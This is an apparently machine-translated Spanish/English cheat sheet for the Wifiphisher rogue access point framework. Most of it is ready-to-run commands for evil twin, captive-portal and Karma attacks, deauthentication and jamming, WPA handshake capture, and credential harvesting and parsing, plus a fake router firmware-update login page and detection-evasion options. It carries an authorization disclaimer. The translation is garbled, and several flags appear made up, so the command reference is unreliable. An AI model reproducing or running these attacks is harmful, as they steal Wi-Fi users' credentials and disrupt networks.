Wifiphisher Wireless Phishing Framework Cheat Sheet

"Clase de la hoja" idbutton id="wifisher-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="wifisher-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada

Sinopsis

Wifisher es un Rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Crea redes inalámbricas falsas para realizar ataques de phishing automatizados contra clientes inalámbricos, capturar credenciales y realizar ataques de hombre en medio.

NOVEDAD Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y evaluaciones de seguridad inalámbrica solamente. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.

Instalación

Kali Linux

# Install from repositories
sudo apt update
sudo apt install wifiphisher

# Install additional dependencies
sudo apt install hostapd dnsmasq

Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq

# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install Wifiphisher
sudo python3 setup.py install

Instalación manual

# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install

Docker Instalación

# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .

# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher

Uso básico

Ataque simple del ataque del ataúd

# Basic attack with automatic target selection
sudo wifiphisher

# Attack specific network
sudo wifiphisher -t "Target_Network"

# Use specific interface
sudo wifiphisher -i wlan0

# Use custom template
sudo wifiphisher -p firmware-upgrade

Interface Management

# List available interfaces
sudo wifiphisher --list-interfaces

# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1

# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon

Referencia del Comando

Opciones básicas

Option	Description
-t, --target	Target network ESSID
-i, --interface	Wireless interface
-jI, --jam-interface	Interface for jamming
-p, --phishing-scenario	Phishing template
-pK, --presharedkey	WPA/WPA2 pre-shared key
-qS, --quitonsuccess	Quit on credential capture

Opciones avanzadas

Option	Description
-aI, --apinterface	AP interface
-nJ, --nojamming	Disable jamming
-e, --essid	Access Point ESSID
-dE, --deauth-essid	Deauth specific ESSID
-dC, --deauth-channels	Deauth channels
-nE, --noextensions	Disable extensions

Opciones de registro

Option	Description
-l, --logging	Enable logging
-lP, --log-path	Log file path
-cP, --credential-log-path	Credential log path
-lC, --log-credentials	Log captured credentials

Plantillas de Phishing

Plantillas disponibles

# List available templates
sudo wifiphisher --list-phishing-scenarios

# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager

Plantilla de actualización de firmware

# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"

# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process

Plantilla de inicio de sesión OAuth

# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"

# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service

Creación de plantilla personalizada

# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/

Configuración de plantilla (config.ini)

[info]
Name = Custom Template
Description = Custom phishing template
Language = en

[context]
# Template-specific settings
ESSID = \\\\{ESSID\\\\}
MAC = \\\\{MAC\\\\}
CHANNEL = \\\\{CHANNEL\\\\}

Ataques avanzados

Evil Twin Attack

# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6

Portal de captura Ataque

# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect

# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect

WPA/WPA2 Handshake Capture

# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/

Karma Attack

# Respond to all probe requests
sudo wifiphisher --karma

# Karma with specific template
sudo wifiphisher --karma -p oauth-login

# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt

Jamming y Deauthentication

Deauthenticación dirigida

# Deauth specific network
sudo wifiphisher -dE "Target_Network"

# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55

# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11

Configuración de jamming

# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1

# Disable jamming
sudo wifiphisher -nJ

# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11

Jamming inteligente

# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming

# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5

Extensiones y complementos

Extensiones disponibles

# List available extensions
sudo wifiphisher --list-extensions

# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality

Crédential Harvester

# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester

# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log

Extensión de la captura de mano

# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture

# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/

DNS Spoofing Extension

# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler

# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf

Desarrollo de plantillas personalizadas

Estructura de la plantilla HTML

<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: \\\\{ESSID\\\\}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>

CSS Styling

/* style.css */
body \\\\{
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
\\\\}

.container \\\\{
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
\\\\}

input \\\\{
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
\\\\}

button \\\\{
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
\\\\}

Función de JavaScript

// script.js
document.addEventListener('DOMContentLoaded', function() \\\\{
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) \\\\{
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;

        if (!username||!password) \\\\{
            e.preventDefault();
            alert('Please enter both username and password');
        \\\\}
    \\\\});

    // Simulate loading
    setTimeout(function() \\\\{
        document.querySelector('.container').style.opacity = '1';
    \\\\}, 500);
\\\\});

Vigilancia y registro

Vigilancia en tiempo real

# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

# Monitor specific log file
tail -f /var/log/wifiphisher.log

Registros Credenciales

# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

# Monitor captured credentials
tail -f /tmp/credentials.log

# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4

Análisis de tráfico

# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap

# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

Técnicas de evacuación

Dirección de MAC Randomización

# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac

# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac

Canalización

# Use channel hopping
sudo wifiphisher --channel-hop

# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11

# Random channel selection
sudo wifiphisher --random-channel

Evasión de tiempo

# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300

# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals

# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode

Solución de problemas

Cuestiones de interfaz

# Check interface status
iwconfig

# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up

# Check for monitor mode support
sudo iw list|grep -A 10 "Supported interface modes"

# Kill conflicting processes
sudo airmon-ng check kill

Cuestiones de admisión

# Check permissions
ls -la /usr/bin/wifiphisher

# Fix permissions
sudo chmod +x /usr/bin/wifiphisher

# Check sudo configuration
sudo visudo

Cuestiones de dependencia

# Check Python dependencies
pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"

# Reinstall dependencies
pip3 install --upgrade -r requirements.txt

# Check system packages
dpkg -l|grep -E "(hostapd|dnsmasq)"

Cuestiones de red

# Check network configuration
ip addr show

# Check routing table
ip route show

# Test internet connectivity
ping -c 4 8.8.8.8

# Check DNS resolution
nslookup google.com

Consideraciones jurídicas y éticas

Requisitos de autorización

# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws

Buenas prácticas

# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines

Recursos

• Repositorio GitHub
• Wifiphisher Documentation
• Guía de prueba de seguridad ininterrumpida
• WiFi Penetration Testing
• Wireless Network Security

-...

*Esta hoja de trampa proporciona una referencia completa para el uso de Wifisher. Siempre asegúrese de tener una autorización adecuada antes de realizar evaluaciones de seguridad inalámbrica. *